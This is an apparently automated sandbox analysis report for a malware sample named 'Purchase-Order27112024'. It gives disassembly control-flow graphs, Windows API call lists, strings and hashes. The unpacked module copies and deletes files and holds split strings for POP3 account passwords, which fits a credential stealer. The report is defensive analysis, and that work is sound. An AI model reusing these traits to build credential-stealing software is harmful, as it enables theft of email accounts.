                                                                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405480
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                                                                        • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405508
                                                                                                      • ShowWindow.USER32(00000000), ref: 0040552C
                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405531
                                                                                                      • ShowWindow.USER32(00000008), ref: 0040557B
                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                                                                      • CreatePopupMenu.USER32 ref: 004055C0
                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004055F4
                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405655
                                                                                                      • EmptyClipboard.USER32 ref: 0040565B
                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                                                                      • CloseClipboard.USER32 ref: 004056B6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                      • String ID: {$&B
                                                                                                      • API String ID: 590372296-2518801558
                                                                                                      • Opcode ID: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                                                                      • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                                                                      • Opcode Fuzzy Hash: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                                                                      • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 432 403cc2-403cd4 433 403e15-403e24 432->433 434 403cda-403ce0 432->434 436 403e73-403e88 433->436 437 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 433->437 434->433 435 403ce6-403cef 434->435 438 403cf1-403cfe SetWindowPos 435->438 439 403d04-403d07 435->439 441 403ec8-403ecd call 4041e6 436->441 442 403e8a-403e8d 436->442 437->436 438->439 444 403d21-403d27 439->444 445 403d09-403d1b ShowWindow 439->445 450 403ed2-403eed 441->450 447 403ec0-403ec2 442->447 448 403e8f-403e9a call 401389 442->448 451 403d43-403d46 444->451 452 403d29-403d3e DestroyWindow 444->452 445->444 447->441 449 404167 447->449 448->447 463 403e9c-403ebb SendMessageW 448->463 458 404169-404170 449->458 456 403ef6-403efc 450->456 457 403eef-403ef1 call 40140b 450->457 461 403d48-403d54 SetWindowLongW 451->461 462 403d59-403d5f 451->462 459 404144-40414a 452->459 466 403f02-403f0d 456->466 467 404125-40413e DestroyWindow EndDialog 456->467 457->456 459->449 464 40414c-404152 459->464 461->458 468 403e02-403e10 call 404201 462->468 469 403d65-403d76 GetDlgItem 462->469 463->458 464->449 471 404154-40415d ShowWindow 464->471 466->467 472 403f13-403f60 call 405f6a call 40419a * 3 GetDlgItem 466->472 467->459 468->458 473 403d95-403d98 469->473 474 403d78-403d8f SendMessageW IsWindowEnabled 469->474 471->449 502 403f62-403f67 472->502 503 403f6a-403fa6 ShowWindow EnableWindow call 4041bc EnableWindow 472->503 475 403d9a-403d9b 473->475 476 403d9d-403da0 473->476 474->449 474->473 479 403dcb-403dd0 call 404173 475->479 480 403da2-403da8 476->480 481 403dae-403db3 476->481 479->468 483 403de9-403dfc SendMessageW 480->483 484 403daa-403dac 480->484 481->483 485 403db5-403dbb 481->485 483->468 484->479 488 403dd2-403ddb call 40140b 485->488 489 403dbd-403dc3 call 40140b 485->489 488->468 498 403ddd-403de7 488->498 500 403dc9 489->500 498->500 500->479 502->503 506 403fa8-403fa9 503->506 507 403fab 503->507 508 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 506->508 507->508 509 403ff0 508->509 510 403fdd-403fee SendMessageW 508->510 511 403ff6-404034 call 4041cf call 405f48 lstrlenW call 405f6a SetWindowTextW call 401389 509->511 510->511 511->450 520 40403a-40403c 511->520 520->450 521 404042-404046 520->521 522 404065-404079 DestroyWindow 521->522 523 404048-40404e 521->523 522->459 525 40407f-4040ac CreateDialogParamW 522->525 523->449 524 404054-40405a 523->524 524->450 526 404060 524->526 525->459 527 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 525->527 526->449 527->449 532 40410b-404123 ShowWindow call 4041e6 527->532 532->459
                                                                                                      APIs
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                                                                      • ShowWindow.USER32(?), ref: 00403D1B
                                                                                                      • DestroyWindow.USER32 ref: 00403D2F
                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                                                                      • EnableWindow.USER32(?,?), ref: 00403F83
                                                                                                      • EnableWindow.USER32(?,?), ref: 00403F9E
                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                                                                      • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                                                                      • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                      • String ID: &B
                                                                                                      • API String ID: 184305955-3208460036
                                                                                                      • Opcode ID: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                                                                      • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                                                                      • Opcode Fuzzy Hash: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                                                                      • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 535 40391f-403937 call 4062b2 538 403939-403949 call 405e8f 535->538 539 40394b-403982 call 405e15 535->539 547 4039a5-4039ce call 403bf5 call 405a9b 538->547 543 403984-403995 call 405e15 539->543 544 40399a-4039a0 lstrcatW 539->544 543->544 544->547 553 403a60-403a68 call 405a9b 547->553 554 4039d4-4039d9 547->554 559 403a76-403a9b LoadImageW 553->559 560 403a6a-403a71 call 405f6a 553->560 554->553 555 4039df-403a07 call 405e15 554->555 555->553 565 403a09-403a0d 555->565 563 403b1c-403b24 call 40140b 559->563 564 403a9d-403acd RegisterClassW 559->564 560->559 578 403b26-403b29 563->578 579 403b2e-403b39 call 403bf5 563->579 568 403ad3-403b17 SystemParametersInfoW CreateWindowExW 564->568 569 403beb 564->569 566 403a1f-403a2b lstrlenW 565->566 567 403a0f-403a1c call 4059c0 565->567 572 403a53-403a5b call 405993 call 405f48 566->572 573 403a2d-403a3b lstrcmpiW 566->573 567->566 568->563 575 403bed-403bf4 569->575 572->553 573->572 577 403a3d-403a47 GetFileAttributesW 573->577 581 403a49-403a4b 577->581 582 403a4d-403a4e call 4059df 577->582 578->575 588 403bc2-403bca call 4052c5 579->588 589 403b3f-403b5c ShowWindow LoadLibraryW 579->589 581->572 581->582 582->572 597 403be4-403be6 call 40140b 588->597 598 403bcc-403bd2 588->598 591 403b65-403b77 GetClassInfoW 589->591 592 403b5e-403b63 LoadLibraryW 589->592 594 403b79-403b89 GetClassInfoW RegisterClassW 591->594 595 403b8f-403bc0 DialogBoxParamW call 40140b call 40386f 591->595 592->591 594->595 595->575 597->569 598->578 600 403bd8-403bdf call 40140b 598->600 600->578
                                                                                                      APIs
                                                                                                        • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                                                                        • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                                                                        • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                                                                      • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,76233420,00000000,00434000), ref: 004039A0
                                                                                                      • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                                                                      • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                                                                      • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A87
                                                                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                                                      • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                                                                      • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                                                                      • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                                                      • API String ID: 914957316-1918744475
                                                                                                      • Opcode ID: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                                                                      • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                                                                      • Opcode Fuzzy Hash: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                                                                      • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 606 404337-404349 607 404469-404476 606->607 608 40434f-404357 606->608 609 4044d3-4044d7 607->609 610 404478-404481 607->610 611 404359-404368 608->611 612 40436a-40438e 608->612 613 4045a5-4045ac 609->613 614 4044dd-4044f5 GetDlgItem 609->614 615 4045b4 610->615 616 404487-40448d 610->616 611->612 617 404390 612->617 618 404397-404412 call 40419a * 2 CheckDlgButton call 4041bc GetDlgItem call 4041cf SendMessageW 612->618 613->615 624 4045ae 613->624 621 404566-40456d 614->621 622 4044f7-4044fe 614->622 620 4045b7-4045be call 404201 615->620 616->615 623 404493-40449e 616->623 617->618 646 404414-404417 GetSysColor 618->646 647 40441d-404464 SendMessageW * 2 lstrlenW SendMessageW * 2 618->647 631 4045c3-4045c7 620->631 621->620 628 40456f-404576 621->628 622->621 627 404500-40451b 622->627 623->615 629 4044a4-4044ce GetDlgItem SendMessageW call 4041bc call 4045ca 623->629 624->615 627->621 632 40451d-404563 SendMessageW LoadCursorW SetCursor ShellExecuteW LoadCursorW SetCursor 627->632 628->620 633 404578-40457c 628->633 629->609 632->621 637 40458e-404592 633->637 638 40457e-40458c SendMessageW 633->638 641 4045a0-4045a3 637->641 642 404594-40459e SendMessageW 637->642 638->637 641->631 642->641 646->647 647->631
                                                                                                      APIs
                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                                                                      • GetSysColor.USER32(?), ref: 00404417
                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                                                                      • lstrlenW.KERNEL32(?), ref: 00404438
                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                                                                      • SendMessageW.USER32(00000000), ref: 004044BA
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                                                                      • SetCursor.USER32(00000000), ref: 00404539
                                                                                                      • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                                                                      • SetCursor.USER32(00000000), ref: 0040455D
                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                      • String ID: N$open
                                                                                                      • API String ID: 3615053054-904208323
                                                                                                      • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                                                      • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                                                                      • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                                                      • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 648 3700173a-370017fe call 3700c030 call 37002c40 * 2 655 37001803 call 37001cca 648->655 656 37001808-3700180c 655->656 657 37001812-37001816 656->657 658 370019ad-370019b1 656->658 657->658 659 3700181c-37001837 call 37001ede 657->659 662 3700183d-37001845 659->662 663 3700199f-370019ac call 37001ee7 * 2 659->663 664 37001982-37001985 662->664 665 3700184b-3700184e 662->665 663->658 669 37001995-37001999 664->669 670 37001987 664->670 665->664 667 37001854-37001881 call 370044b0 * 2 call 37001db7 665->667 682 37001887-3700189f call 370044b0 call 37001db7 667->682 683 3700193d-37001943 667->683 669->662 669->663 673 3700198a-3700198d call 37002c40 670->673 677 37001992 673->677 677->669 682->683 699 370018a5-370018a8 682->699 684 37001945-37001947 683->684 685 3700197e-37001980 683->685 684->685 687 37001949-3700194b 684->687 685->673 689 37001961-3700197c call 370016aa 687->689 690 3700194d-3700194f 687->690 689->677 692 37001951-37001953 690->692 693 37001955-37001957 690->693 692->689 692->693 696 37001959-3700195b 693->696 697 3700195d-3700195f 693->697 696->689 696->697 697->685 697->689 700 370018c4-370018dc call 370044b0 call 37001db7 699->700 701 370018aa-370018c2 call 370044b0 call 37001db7 699->701 700->669 710 370018e2-3700193b call 370016aa call 370015da call 37002c40 * 2 700->710 701->700 701->710 710->669
                                                                                                      APIs
                                                                                                        • Part of subcall function 37001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D1B
                                                                                                        • Part of subcall function 37001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 37001D37
                                                                                                        • Part of subcall function 37001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D4B
                                                                                                      • _strlen.LIBCMT ref: 37001855
                                                                                                      • _strlen.LIBCMT ref: 37001869
                                                                                                      • _strlen.LIBCMT ref: 3700188B
                                                                                                      • _strlen.LIBCMT ref: 370018AE
                                                                                                      • _strlen.LIBCMT ref: 370018C8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strlen$File$CopyCreateDelete
                                                                                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                      • API String ID: 3296212668-3023110444
                                                                                                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                      • Instruction ID: 927bebb4ce4892ca4cc19f17c6d5ac490f9e3e9bf37250db30a7b4c639715583
                                                                                                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                      • Instruction Fuzzy Hash: 7061E275D04218AFFF11CBE4C980BDEB7FAAF45224F4040DAD104A7290EB786A46CF96

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strlen
                                                                                                      • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                      • API String ID: 4218353326-230879103
                                                                                                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                      • Instruction ID: 6f974758dbac83a1b2d9b3413d82bb82f090bc691c7bb42bfb8a36123945800c
                                                                                                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                      • Instruction Fuzzy Hash: 0371F4B1D002285FEB119BB4D994ADF7BFCAB0A360F5040D6E644E7241E678D785CFA1

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 788 405c66-405c8d lstrcpyW 789 405cb5-405cc4 GetShortPathNameW 788->789 790 405c8f-405ca7 call 405bb4 CloseHandle GetShortPathNameW 788->790 791 405cca-405ccc 789->791 792 405ddc-405de1 789->792 790->792 796 405cad-405caf 790->796 791->792 794 405cd2-405d10 wsprintfA call 405f6a call 405bb4 791->794 794->792 801 405d16-405d32 GetFileSize GlobalAlloc 794->801 796->789 796->792 802 405dd5-405dd6 CloseHandle 801->802 803 405d38-405d42 call 405c37 801->803 802->792 803->802 806 405d48-405d55 call 405b19 803->806 809 405d57-405d69 lstrcpyA 806->809 810 405d6b-405d7d call 405b19 806->810 811 405da0 809->811 815 405d9c 810->815 816 405d7f-405d85 810->816 814 405da2-405dcf call 405b6f SetFilePointer WriteFile GlobalFree 811->814 814->802 815->811 818 405d8d-405d8f 816->818 820 405d91-405d9a 818->820 821 405d87-405d8c 818->821 820->814 821->818
                                                                                                      APIs
                                                                                                      • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                                                                      • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                                                                        • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                                                                        • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                                                                      • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                                                                      • wsprintfA.USER32 ref: 00405CDE
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                                                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                                                                        • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                                                                        • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                                                                      • API String ID: 1265525490-899692902
                                                                                                      • Opcode ID: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                                                                      • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                                                                      • Opcode Fuzzy Hash: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                                                                      • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                                                                      APIs
                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
